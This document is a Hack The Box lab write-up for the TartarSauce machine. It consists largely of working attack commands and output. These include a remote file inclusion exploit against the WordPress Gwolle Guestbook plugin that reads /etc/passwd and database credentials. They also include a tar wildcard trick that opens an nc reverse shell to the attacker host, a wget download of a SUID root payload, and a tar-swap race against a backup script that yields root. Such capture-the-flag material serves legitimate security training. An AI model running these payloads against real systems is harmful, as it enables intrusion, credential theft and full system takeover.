[HTB Notes] TartarSauce

1. Check open ports
nmap --min-rate 1000 -p- -v 10.10.10.88
# 80/tcp open  http
nmap -oN tartarsauce.nmap -p80 -sC -sV -v 10.10.10.88
# 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
# | http-methods:
# |_  Supported Methods: GET HEAD POST OPTIONS
# | http-robots.txt: 5 disallowed entries
# | /webservices/tar/tar/source/
# | /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
# |_/webservices/developmental/ /webservices/phpmyadmin/
# |_http-server-header: Apache/2.4.18 (Ubuntu)
# |_http-title: Landing Page

2. Explore webservices on port 80
[x] Login as:
[x] USERNAME: admin
[x] PASSWORD: admin
[x] Exploit webservice [RABBIT HOLE]
[x] Run gobuster on http://10.10.10.88/
gobuster -u http://10.10.10.88 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# /webservices (Status: 301)
gobuster -u http://10.10.10.88/webservices -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# /wp (Status: 301)
nikto -host http://10.10.10.88/webservices/wp/
# + Uncommon header 'link' found, with contents:
#     <http:/10.10.10.88/webservices/wp/index.php/wp-json/>;
#     rel="https://api.w.org/"
"\/wp\/v2":{ ... }
"\/wp\/v2\/posts":{ ... }
"\/wp\/v2\/pages":{ ... }
[x] Contains a page with a Gwolle Guestbook plugin
[x] Search available exploits for Gwolle Guestbook
searchsploit gwolle
# WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion
[x] Check plugin version in /wp-content/plugins/gwolle-gb/readme.txt
[*] “Changed version from 1.5.3 to 2.3.10 to trick wpscan ;D”
[x] Exploit Gwolle Guestbook (CVE-2015-8351)
[x] Start HTTP server in your working directory
python -m SimpleHTTPServer
# Serving HTTP on 0.0.0.0 port 8000 ...
[x] Create file called wp-load.php
echo '<?php echo shell_exec("id"); ?>' > wp-load.php
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
echo '<?php echo shell_exec("cat /etc/passwd"); ?>' > wp-load.php
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
# onuma:x:1000:1000:,,,:/home/onuma:/bin/bash
echo '<?php echo shell_exec("cat /var/www/html/webservices/wp/wp-config.php"); ?>' > wp-load.php
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
# /** MySQL database username */
# define('DB_USER', 'wpuser');
#
# /** MySQL database password */
# define('DB_PASSWORD', 'w0rdpr3$$d@t@b@$3@cc3$$');
echo '<?php echo shell_exec("mysql -uwpuser -pw0rdpr3$\$d@t@b@$3@cc3$$ -e \"SHOW DATABASES\""); ?>' > wp-load.php
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
# [RABBIT HOLE]

3. Attempt Privilege Escalation (www-data -> onuma)
[x] Check Privileges
echo '<?php shell_exec("sudo -l"); ?>' > wp-load.php
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
# User www-data may run the following commands on TartarSauce:
#     (onuma) NOPASSWD: /bin/tar
[x] Exploit tar wildcard to generate reverse shell
[x] Update wp-load.php
<?php
$htb_ipv4 = "0.0.0.0"; // CHANGE THIS
$payload = "rm /tmp/x; mkfifo /tmp/x; cat /tmp/x | /bin/bash -i 2>&1 | nc ".$htb_ipv4." 4444 > /tmp/x";
file_put_contents("shell.sh", $payload);

shell_exec("chmod +x shell.sh");
shell_exec("echo > --checkpoint=1");
shell_exec("echo > --checkpoint-action=exec=sh\ shell.sh");

$tar = "sudo -u onuma /bin/tar ";
shell_exec($tar."-cvf /tmp/something.tar *");
?>
[x] Set-up netcat listener on local machine
nc -lvp 4444
# listening on [any] 4444 ...
[x] Run Gwolle Guestbook exploit
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
[x] While inside user (onuma) shell
id
# uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
find ~ -name user.txt
# /home/onuma/user.txt
cat /home/onuma/user.txt
# b2d6ec45472467c836f253bd170182c7

3. Attempt Privilege Escalation (onuma -> root)
[x] Check system architecture
uname -a
# Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux
#
# System runs on a 32-bit processor
[x] Upload and run pspy (32-bit)
cd /tmp
wget http://HTB_IPv4:8000/pspy32s
chmod +x pspy32s
./pspy32s
# CMD: UID=0 | /bin/bash /usr/sbin/backuperer
[x] backuperer script runs every 5 minutes
[x] Check out backuperer script
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
[1] /var/www/html is backuped
[x] filename is a random string everytime
[2] The script sleeps to wait for backup to finish
[3] Checks if $tmpfile and /var/www/html have the same files
[x] Exploit integrity_chk() in backuperer script
[x] Create SUID payload using C (suid.c)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setuid(0);
    system("id");
    system("/bin/bash");

    return 0;
}
[x] Compile suid.c as a 32-bit executable
gcc -m32 -o suid suid.c
file ./suid
# ... ELF 32-bit LSB pie executable ...
[x] Update wp-load.php
<?php
$htb_ipv4 = "0.0.0.0"; // CHANGE THIS

shell_exec("wget http://".$htb_ipv4.":8000/suid");
shell_exec("mv suid /var/www/html/suid");
shell_exec("chmod 4755 /var/www/html/suid");

$backuperer = ""; // FILENAME OF BACKUP FILE IN /var/tmp/
$tar = "sudo -u onuma /bin/tar ";
shell_exec($tar."-zcvf /var/tmp/".$backuperer." --owner=0 --group=0 /var/www/html/suid");

shell_exec("rm /var/www/html/suid");
?>
[x] When backuperer sleeps for 30 seconds:
[x] Copy the backup’s filename saved in /var/tmp/
[x] Update $backuperer in wp-load.php
[x] Run Gwolle Guestbook exploit
curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://HTB_IPv4:8000/
[x] After integrity_chk() runs:
cd /var/tmp/check/var/www/html
ls -la
# -rwsr-xr-x 1 root root 15480 Oct 20 01:36 suid
./suid
# uid=0(root) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
[x] While inside root shell:
find / -name root.txt
# /root/root.txt
cat /root/root.txt
# e79abdab8b8a4b64f8579a10b2cd09f9